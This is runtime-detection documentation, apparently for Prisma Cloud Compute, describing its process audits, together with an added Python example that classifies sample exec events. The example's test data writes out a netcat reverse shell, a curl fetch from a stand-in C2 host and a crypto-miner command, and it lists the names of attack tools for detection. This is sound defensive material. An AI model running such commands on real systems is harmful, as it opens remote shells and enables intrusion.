This document summarizes all the runtime audits (detections) that are available in Prisma Cloud Compute. For each detection, you can learn what it actually detects, how to enable or disable it, how to avoid false positives, which workloads it applies to (Containers, Hosts, Serverless and App-embedded), and whether the audit also generates an incident.
Runtime detections for processes
Triggers an incident
Indicates when a process that is not part of the runtime model was spawned.
Port Scanning Process
Indicates that a process identified as a port scanning tool was spawned.
<process> launched and is identified as a process used for port scanning
Explicitly Denied Process
Indicates that a process listed in the Denied & fallback list was spawned.
<process> launched and is explicitly denied by runtime rule. Full command <command>
Containers, Hosts, Serverless, App-embedded
Indicates a modified process was spawned. A modified process is a process whose binary was created or modified after the container was started.
A modified executable <process> was launched
Indicates that a package binary file was replaced during image build. This detection will generate an audit when a process is started from an altered binary.
<process path> launched and is detected as an altered or corrupted package binary. The file metadata doesn’t match what’s reported by the package manager.
Crypto Miner Process
Indicates a process that is identified as a crypto miner was spawned.
<process> launched and is identified as a crypto miner. Full command: <path>
Containers, Hosts, Serverless, App-embedded
Lateral Movement Process
Indicates a process that is used for lateral movement was spawned.
<process> launched and is identified as a process used for lateral movement. Full command: <path>
Temporary File System Process
Indicates that a process is running from a temporary file system.
<process> launched from a temporary file storage, which usually indicates malicious activity.
Indicates that the Prisma Cloud process policy was hijacked.
Possible tampering of Defender policy detected.
Indicates that a process was identified as running a reverse shell.
<process> is a reverse shell. Full command: <path>
Indicates that a process is running with elevated privileges, by watching for executed binaries that have the setuid bit set.
<process> launched and detected as a process started with SUID. Full command: <path>
Unknown Origin Binary by service
Indicates that a binary which was written by a service, rather than by the OS distribution's package manager, was executed.
<process path> launched from a binary file which was written by <creating process path>, which is not a known OS distribution package manager.
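To make the heuristics behind these process audits concrete, here is an added example (not Prisma Cloud Compute code and not a description of how Defender is implemented) that applies the checks the audits above describe to constructed process-exec events: membership in the learned runtime model, the Denied & fallback list, known port scanner, crypto miner and lateral movement tool names, a binary modified after the container started, a package binary whose hash no longer matches the package manager's record, execution from a temporary file system, the setuid bit, and a binary written by something other than a package manager. Every field name, tool list, path, the `ExecEvent` and `RuntimeModel` types, the sample events and the names used for the audits whose names do not appear on this page are assumptions made for the example.

```python
# Added example, not Prisma Cloud Compute code. Applies the heuristics the
# process audits describe to constructed exec events. All names, paths, tool
# lists and sample data are assumptions for illustration.
import hashlib
import os
import stat
from dataclasses import dataclass, field


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


@dataclass
class ExecEvent:
    path: str             # absolute path of the executed binary
    argv: list            # full command line
    mtime: float          # binary's last-modified time, epoch seconds
    mode: int             # st_mode bits of the binary
    digest: str           # sha256 of the binary's contents
    written_by: str = ""  # path of the process that wrote the binary, if known


@dataclass
class RuntimeModel:
    container_start: float   # epoch seconds when the container started
    learned: set             # process names learned during the learning period
    denied: set              # Denied & fallback list entries (names or paths)
    package_manifest: dict   # path -> sha256 recorded by the package manager
    package_managers: set = field(default_factory=lambda: {
        "/usr/bin/dpkg", "/usr/bin/rpm", "/sbin/apk", "/usr/bin/apt-get"})


# Assumed, deliberately tiny tool lists; a real product ships a curated set.
PORT_SCANNERS = {"nmap", "masscan", "zmap"}
CRYPTO_MINERS = {"xmrig", "minerd", "cpuminer"}
LATERAL_MOVEMENT = {"psexec.py", "evil-winrm", "smbexec.py"}
TEMP_FS_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/")


def classify(ev: ExecEvent, model: RuntimeModel) -> list:
    """Return (audit name, message) pairs raised by one exec event."""
    name = os.path.basename(ev.path)
    cmd = " ".join(ev.argv)
    findings = []
    if ev.path in model.denied or name in model.denied:
        findings.append(("Explicitly Denied Process",
                         f"{name} launched and is explicitly denied by runtime rule. Full command {cmd}"))
    elif name not in model.learned:
        findings.append(("Process Not in Runtime Model",
                         f"{name} launched and is not part of the runtime model"))
    if name in PORT_SCANNERS:
        findings.append(("Port Scanning Process",
                         f"{name} launched and is identified as a process used for port scanning"))
    if name in CRYPTO_MINERS:
        findings.append(("Crypto Miner Process",
                         f"{name} launched and is identified as a crypto miner. Full command: {cmd}"))
    if name in LATERAL_MOVEMENT:
        findings.append(("Lateral Movement Process",
                         f"{name} launched and is identified as a process used for lateral movement. Full command: {cmd}"))
    # Binary created or modified after the container started.
    if ev.mtime > model.container_start:
        findings.append(("Modified Process", f"A modified executable {name} was launched"))
    # Package-owned file whose contents no longer match the package manager's record.
    expected = model.package_manifest.get(ev.path)
    if expected is not None and expected != ev.digest:
        findings.append(("Altered Package Binary",
                         f"{ev.path} launched and is detected as an altered or corrupted package binary"))
    if ev.path.startswith(TEMP_FS_PREFIXES):
        findings.append(("Temporary File System Process",
                         f"{name} launched from a temporary file storage"))
    if ev.mode & stat.S_ISUID:
        findings.append(("SUID Process",
                         f"{name} launched and detected as a process started with SUID. Full command: {cmd}"))
    if ev.written_by and ev.written_by not in model.package_managers:
        findings.append(("Unknown Origin Binary by service",
                         f"{ev.path} launched from a binary file which was written by {ev.written_by}"))
    return findings


def audit_names(ev: ExecEvent, model: RuntimeModel) -> list:
    return [name for name, _ in classify(ev, model)]


# Constructed sample data: two versions of "curl" stand in for real file contents.
ORIGINAL_CURL = b"\x7fELF curl as shipped by the package"
PATCHED_CURL = b"\x7fELF curl with extra code appended"
START = 1_700_000_000.0
MODEL = RuntimeModel(container_start=START, learned={"nginx", "curl", "sh"}, denied={"nc"},
                     package_manifest={"/usr/bin/curl": sha256(ORIGINAL_CURL)})
EVENTS = [
    ExecEvent("/usr/bin/curl", ["curl", "https://example.invalid"], START - 86400, 0o100755, sha256(ORIGINAL_CURL)),
    ExecEvent("/usr/bin/curl", ["curl", "http://c2.invalid/x"], START + 60, 0o100755, sha256(PATCHED_CURL), written_by="/bin/sh"),
    ExecEvent("/tmp/xmrig", ["xmrig", "-o", "pool.invalid:3333"], START + 120, 0o100755, sha256(b"miner")),
    ExecEvent("/usr/bin/nmap", ["nmap", "-sS", "10.0.0.0/24"], START - 86400, 0o100755, sha256(b"nmap")),
    ExecEvent("/usr/bin/nc", ["nc", "-e", "/bin/sh", "10.0.0.5", "4444"], START - 86400, 0o104755, sha256(b"nc")),
]

if __name__ == "__main__":
    for ev in EVENTS:
        for audit, message in classify(ev, MODEL):
            print(f"[{audit}] {message}")
```

Note the ordering: the deny list is checked before runtime-model membership, so an explicitly denied process raises the denied audit rather than a generic not-in-model audit, and a single exec event can raise several audits at once (the patched curl raises modified, altered-package and unknown-origin together). A real sensor would determine the temporary file system from the mount type rather than a path prefix and would take the package manifest from dpkg or rpm metadata; both are simplified here.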
Unknown Origin Binary by user